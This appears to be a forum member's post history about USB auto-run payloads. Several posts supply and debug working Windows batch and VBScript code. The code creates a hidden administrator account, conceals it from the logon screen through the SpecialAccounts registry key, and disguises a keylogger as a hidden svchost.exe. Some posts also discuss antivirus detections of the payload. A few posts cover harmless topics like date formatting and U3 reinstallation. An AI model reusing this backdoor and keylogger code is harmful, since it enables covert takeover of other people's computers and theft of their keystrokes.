DMilton

Active Members
  • Posts

    132
  • Joined

  • Last visited

Everything posted by DMilton

  1. :P It was only a little modified copy-paste, a piece of code from somewhere of some payload...
  2. You can format the date by using a simple VBScript and passing variables to the batch. Something like this will give you the date and time in a readable form:

        Set objShell = CreateObject("Wscript.Shell")
        Set objEnv = objShell.Environment("PROCESS")
        strDate = Year(now()) & Right("0" & Month(now()), 2) & Right("0" & Day(now()), 2)
        strTime = Right("0" & Hour(now()), 2) & Right("0" & Minute(now()), 2) & Right("0" & Second(now()), 2)
        'Month/Day/Year
        strFormDate = Right("0" & Month(now()), 2) & "." & Right("0" & Day(now()), 2) & "." & Year(now())
        'HH:MM:SS
        strFormTime = Right("0" & Hour(now()), 2) & "." & Right("0" & Minute(now()), 2) & "." & Right("0" & Second(now()), 2)
        'Exported to the process environment so the launched batch can read %Date% and %Time%
        objEnv("Date") = strFormDate
        objEnv("Time") = strFormTime
        strPath = "YOURBATCH.BAT"
        objShell.Run strPath, 1, False

    You can pass the Date and Time vbs variables to YOURBATCH.BAT to format the time and date of the logs:

        \stext %computername%[%Date%-%Time%].txt

    etc... :EDIT The first line must be: Set objShell = CreateObject("Wscript.Shell")
  3. System.exe is detected by NOD32 antivirus as NewHeur_PE (Virus)... when downloading the .rar. With the payload.exe, I get another warning about b2e.dll as Win32/Qhost.NFV (Trojan) with NOD32. Is the b2e.dll part of the backdoor? I think the payload.exe does the payload.bat stuff with the AdminGroup variable given by 1.vbs, installing all the keylogger and backdoor, opening ports, adding reg keys, etc...? Are all the needed programs packed in the payload.exe? The medicine continues going wrong with non-conventional paths; it can be done by using a similar way as for installing the payload. I like the easy and effective way the keylogger works, but it doesn't work with combinations of [ALT]. When a combination is pressed (as [CTRL]+something) the [CTRL] is printed many times... I assume no clicks are saved to the keylogger log... I will be testing some of the functionalities in a few days. Too many things? Good job and many thanks for the credits!
  4. DMilton

    USB Terrorism

    But... What do you want to delete? I think it is not very difficult to script it, but what do you want to delete? Many files are running in the background (system and user files) and can't be deleted. If you want to delete some of them (as for example some dll or some antivirus file), you must kill them (see killing av's in this forum) or you must do it before the system has been restarted (as done by Unlocker). If you tell us what you want to delete, it could be possible to program an application to do the job. Is the job you're thinking of white hat hacking?
  5. Some issues and fixing them...

        net user Tanto password /add && net localgroup administrators Tanto /add

    In the adding of the Tanto administrator account, the payload will only create it if the administrators group name is "administrators" (it's not my case). It will cause an error and will not work for systems whose Administrators group has been renamed or which are installed in another language. A solution would be getting the correct administrators group name for a secure creation of the Tanto user. This way was the one I was developing in this post. The idea is getting the name of the Administrators group by asking for the S-1-5-32-544 SID and passing it to the payload in a variable.

        ::Hide Tanto's folder from prying eyes
        attrib +r +a +s +h %SystemDrive%\docume~1\Tanto

    Before you attrib anything, you must create the folder, and in the batch code it isn't. The correct code would be:

        ::Create and hide Tanto's folder from prying eyes
        mkdir %SystemDrive%\docume~1\Tanto
        attrib +r +a +s +h %SystemDrive%\docume~1\Tanto

        ::Change file attributes to Read-only, Hidden, Archive, and System attributes to the file
        ATTRIB +H %windir%\svchost.exe

    In the attribution of Read-only, Hidden, Archive and System to the keylogger you omitted the +r +a +s. The correct line would be:

        ::Change file attributes to Read-only, Hidden, Archive, and System attributes to the file
        ATTRIB +r +a +s +h %windir%\svchost.exe

        ::Delete Keylogger
        (
        cd %windir%
        del svchost.exe
        )

    In the deletion task of the svchost.exe file, this code will fail because the payload is running from the USB and not the %SystemDrive%. The correct code would be:

        ::Delete Keylogger
        del %windir%\svchost.exe

    SUGGESTIONS: I prefer to add the name of the account and the password by putting it in a variable at the beginning of the batch, or in an .ini file if it's exe-compiled and can't be edited, so we can add the user we want and not only the Tanto user.
  6. Windows Firewall works fine and is easy to configure. But if you have a router, configuring both would be the best option for me.
  7. I have a new 8Gb SANDISK usb and get the same problem! Is there any new version available? I have been looking for it but...
  8. The illegality is not what you have, but what you do with it... If you do illegalities, then it's illegal <_<
  9. DMilton

    getmail?

    The only thing you have to do is log into gmail and retrieve the files yourself... The files are attached to the received mail.
  10. The only one I have by the moment is the fault of profile selection, but I haven't proved all the stuff...
  11. I saw it, you have done fast work, but by the way, I hope the code I posted will be interesting for someone!
  12. If you want, we can code an aspirin for you, man! You did it fast and easy, good job, I feel the idea is very good! I'll be testing it during the next days. The name of the tool is cool. Sleep a bit by now! :edit By the way, I don't know if the antidote is working, because it doesn't delete the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Tanto user. It doesn't generate the .txt files unless I exec it from the system drive root. When I exec it, it leaves three exe files running in Task Manager: beta2.exe, cmd.exe and reg.exe. Antidote doesn't terminate those tasks at all and leaves another reg.exe instance running in the background. I think it can be caused by some problem with path names? If you want, PM me the source, I'll take a look at it.
  13. While you decide what the payload should do, I've been playing with some of your first ideas. Executing it will extract the Administrators group name in a reliable way for any installation language, or even if the user is experienced and has changed it, into a variable that can be used by the called batch. The idea of using a batch-calling program is to continue in the batch way you mentioned, but because I don't know how to extract the real Administrators group name in the command line, I did it in VBScript, ready to use. By the way, here is the code for the VBScript:

        'ListAdminGroup.vbs
        Set objWshNetwork = CreateObject("WScript.Network")
        Set objShell = CreateObject("Wscript.Shell")
        Set objEnv = objShell.Environment("PROCESS")
        str_PC = objWshNetwork.ComputerName
        ' SID of the Administrators group
        str_GroupSID = "S-1-5-32-544"
        str_GroupName = GetGroupName(str_PC, str_GroupSID)
        Set obj_Group = GetObject("WinNT://" & str_PC & "/" _
            & str_GroupName & ",group")
        ' Export the resolved name so the batch can read %AdminGroup%
        objEnv("AdminGroup") = str_GroupName
        strPath = "start.bat"
        objShell.Run strPath, 1, False

        Function GetGroupName(sComputer, sGroupSID)
            Dim oGroupAccounts, oGroupAccount
            'Set for WinXP
            Set oGroupAccounts = GetObject( _
                "winmgmts://" & sComputer & "/root/cimv2") _
                .ExecQuery("Select Name from Win32_Group" _
                & " WHERE Domain = '" & sComputer & "' AND SID = '" & sGroupSID & "'")
            'For Win2k we use the 'BUILTIN' domain
            If oGroupAccounts.Count = 0 Then
                Set oGroupAccounts = GetObject( _
                    "winmgmts://" & sComputer & "/root/cimv2") _
                    .ExecQuery("Select Name from Win32_Group" _
                    & " WHERE Domain = 'BUILTIN' AND SID = '" & sGroupSID & "'")
            End If
            For Each oGroupAccount In oGroupAccounts
                GetGroupName = oGroupAccount.Name
            Next
        End Function

    I think it will work in Windows XP and Windows 2000, but if you can play with it in other versions, that will be great. Once the script has finished, it launches the start.bat batch.
    It will create an administrator account whose name is defined in the %NewAdmin% variable, with a password given by the %password% variable, and add it into the Administrators group, using the %AdminGroup% variable given by the vbs. It creates the correct folder, hides it, and adds the new account name to the Special Accounts, to be invisible to the user. Here is the start.bat code. By the way, it must be in the same dir as the VBScript.

        ::start.bat
        @echo off
        set NewAdmin=USBAdmin
        set password=YouWasHacked!
        set Folder=%SystemDrive%\Documents and Settings\%NewAdmin%
        net localgroup %AdminGroup% %NewAdmin% /add
        net user %NewAdmin% %password% /add
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %NewAdmin% /t REG_DWORD /d 0
        mkdir "%Folder%"
        attrib +a +s +h "%Folder%"

    It will also solve the Tcstool for fewer fingerprints. About the Tcstool question: the code for Users.vbs can be:

        'Users.vbs
        Option Explicit
        Dim obj_UserName
        Dim obj_GroupName
        Dim obj_PC
        Dim obj_Group
        Dim obj_Shell
        Dim str_Computer
        Dim str_Name
        Dim objFSO
        Dim objTextFile
        Dim str_File
        Dim M
        Const ForReading = 1, ForWriting = 2, ForAppending = 8
        'Output file name can be given as the first argument
        If WScript.Arguments.count > 0 Then
            str_File = WScript.Arguments.item(0)
        Else
            str_File = "users.txt"
        End If
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objTextFile = objFSO.OpenTextFile (str_File, ForWriting, True)
        str_Computer = "."
        Set obj_Shell = CreateObject("WScript.Shell")
        str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%")
        Set obj_PC = GetObject("WinNT://" & str_Computer & ",Computer")
        obj_PC.Filter = Array("Group")
        For Each obj_GroupName In obj_PC
            Set obj_Group = GetObject("WinNT://" & str_Computer & "/" & obj_GroupName.Name & ",Group")
            obj_Group.members.Filter = Array("User")
            For Each obj_UserName In obj_Group.members
                set M = obj_UserName
                objTextFile.WriteLine(obj_UserName.Name)
            Next
        Next
        objTextFile.Close

    It will extract all user names into a new users.txt file for further use. And that's all by the moment!
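The two tricks in the post above (hiding an account through SpecialAccounts\UserList and resolving the Administrators group by its SID rather than its name) are also exactly what a defender should audit for. The following PowerShell check is an added example, not DMilton's or the payload's code; it assumes Windows PowerShell 5.1 or later for Get-LocalGroupMember and an elevated prompt.

```powershell
# Added audit example (not DMilton's or the payload's code).
# Assumes Windows PowerShell 5.1+ (Get-LocalGroupMember) and an elevated prompt.
$UserListKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'

function Get-HiddenLogonAccounts {
    # Names registered under SpecialAccounts\UserList with value 0 are
    # hidden from the welcome screen; the key does not exist on a default install.
    if (-not (Test-Path -Path $UserListKey)) { return @() }
    (Get-ItemProperty -Path $UserListKey).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' -and $_.Value -eq 0 } |
        ForEach-Object { $_.Name }
}

function Get-LocalAdminNames {
    # Resolve the Administrators group by its well-known SID S-1-5-32-544, so
    # the check works whatever the display language (Administrators, Administradores, ...).
    Get-LocalGroupMember -SID 'S-1-5-32-544' |
        Where-Object { $_.ObjectClass -eq 'User' } |
        ForEach-Object { ($_.Name -split '\\')[-1] }
}

function Find-HiddenAdmins {
    param([string[]]$Hidden, [string[]]$Admins)
    # Case-insensitive intersection, kept separate so it can be exercised
    # with constructed input such as -Hidden @('USBAdmin') -Admins @('usbadmin').
    $Hidden | Where-Object { $Admins -contains $_ }
}

$hidden  = @(Get-HiddenLogonAccounts)
$admins  = @(Get-LocalAdminNames)
$suspect = @(Find-HiddenAdmins -Hidden $hidden -Admins $admins)

if ($hidden.Count -eq 0) {
    Write-Output 'No accounts hidden via SpecialAccounts\UserList.'
} else {
    Write-Output ('Hidden logon accounts: ' + ($hidden -join ', '))
}
foreach ($name in $suspect) {
    $user   = Get-LocalUser -Name $name -ErrorAction SilentlyContinue
    $pwdSet = if ($user) { $user.PasswordLastSet } else { 'unknown' }
    Write-Output "ALERT: hidden account '$name' is a local Administrator (password last set: $pwdSet)"
}
```

Any name that is both hidden from the logon screen and a member of S-1-5-32-544 has no legitimate reason to exist on a workstation and is worth an incident ticket.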
  14. I'm cleaning the code you posted, making it efficient in any installation language, adding some other things, and it will be posted as soon as I have it working right.
  15. DMilton

    Help!

    You can uninstall the U3 software and install it again. On the SANDISK web, you can download utils to do it. There is also a troubleshooting guide HERE. Try it and tell us if it went ok.
  16. That occurs when one can't try it in Server 2003... Ok, another thing to think about! <_< I'll be squishing my little brain to find a solution (in batch) to help in the payload development. Thanks a lot for your memo moonlit.
  17. For point 5, you can execute this code; it's in VBScript. Of course, it can be modified to show only the users and not the groups... UsersGroups.vbs

        'UsersGroups.vbs
        'This script enumerates users, grouped for each local group in a computer
        'It creates a new file called users.txt in the same directory it's executed from.
        'The code has been rebuilt from a similar app, but it works fine
        'DMilton for free community
        'Thread post at http://hak5.org/forums/index.php?showtopic=10746

        'Variables explicit declaration
        Option Explicit
        Dim obj_UserName
        Dim obj_GroupName
        Dim obj_PC
        Dim obj_Group
        Dim obj_Shell
        Dim str_PC
        Dim str_Name
        Dim objFSO
        Dim objTextFile
        Dim I
        Dim ExitFile
        Const ForReading = 1, ForWriting = 2, ForAppending = 8
        'Arguments
        ExitFile = "users.txt"
        'Exit file creation
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objTextFile = objFSO.OpenTextFile (ExitFile, ForWriting, True)
        'Local computer var creation str_Name
        str_PC = "."
        Set obj_Shell = CreateObject("WScript.Shell")
        str_Name = obj_Shell.ExpandEnvironmentStrings("%COMPUTERNAME%")
        'Creates an object obj_PC containing the actual local computer
        Set obj_PC = GetObject("WinNT://" & str_PC & ",Computer")
        ObjTextFile.WriteLine("Computer name is: " & str_Name)
        'Now we filter objects to obtain groups
        obj_PC.Filter = Array("Group")
        'Going through the objects and writing the txt
        For Each obj_GroupName In obj_PC
            'Creating an object obj_Group containing the actual group
            Set obj_Group = GetObject("WinNT://" & str_PC & "/" & obj_GroupName.Name & ",Group")
            'Writing the txt and formatting it
            objTextFile.WriteLine("Users from Group: " & obj_GroupName.Name)
            'Filtering objects from the group to obtain users
            obj_Group.members.Filter = Array("User")
            'Printing each user
            For Each obj_UserName In obj_Group.members
                objTextFile.WriteLine("    " & obj_UserName.Name)
            Next
        Next
        'Cleaning the variables
        objTextFile.Close
        Set obj_UserName = Nothing
        Set obj_GroupName = Nothing
        Set obj_PC = Nothing
        Set obj_Shell = Nothing

    Moreover, I think that with the groups info in the final users.txt, adding a key in the registry for creating an admin account is simple, or not?

        net user "USBAdmin" /add
        net localgroup administrator "USBAdmin" /add
        net user "USBAdmin" password

    The problem with adding privileges is that this automation would work in English versions but not in other languages such as Spanish, where the Administrators group is named Administradores, but with the listed groups in the vbs, you can easily extract the "Admin"-istrators or "Admin"-istradores correct word to add the correct privileges. Finally, it would be necessary to add "USBAdmin" to the Special Accounts User List, by adding a DWORD 0 for the created "USBAdmin", executing it in a batch (or whatever). In this case, from the command line it would be...

        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v USBAdmin /t REG_DWORD /d 0

    :P
  18. Those ones are the latest and, in my opinion, the best ones to work with, but you can also add the U3 Incident Response Payload that, very basically, is used to get forensic information from the PC. Read the topic, I think it'll be interesting: U3 Incident Response Payload
  19. That's cool man! You got the non-.Net Framework version and it looks fine. Thanks for your effort in this. How did you avoid using the .Net Framework? The other thing is... the profile selector... But it looks ok. I'll be testing it for a while and waiting for Leapo's updates to make it better.
  20. It'll be perfect if you do it by yourself, by looking for the outdated files (most we can find at the nirsoft website), searching and grabbing the Internet, compiling some interesting posts containing new code for implementation, the GonZor 2.0 version... etc. And when you have it, the best is that you post it. You can upload the files to the packages point, correct the obsolete wiki contents, code some new stuff and create a great usb payload with all this. Jokes apart, the one you are looking for is out there, the only thing you have to do is search for it, ElevenWarrior. As I told you a few days ago, googling is one of the best ways to find out what you want, and if not found... search again, and finally: asking.
  21. Fine, but next time, I suggest you the search tool or googling it... If it took me about 30 secs to find it, probably you would be able to find it too! Searching is the best way to find what you're looking for, and it's a good way to find very interesting things you're not looking for too.
  22. DMilton

    remove gonzor

    Of course, you can install the original version of the U3 CRUZER from SANDISK...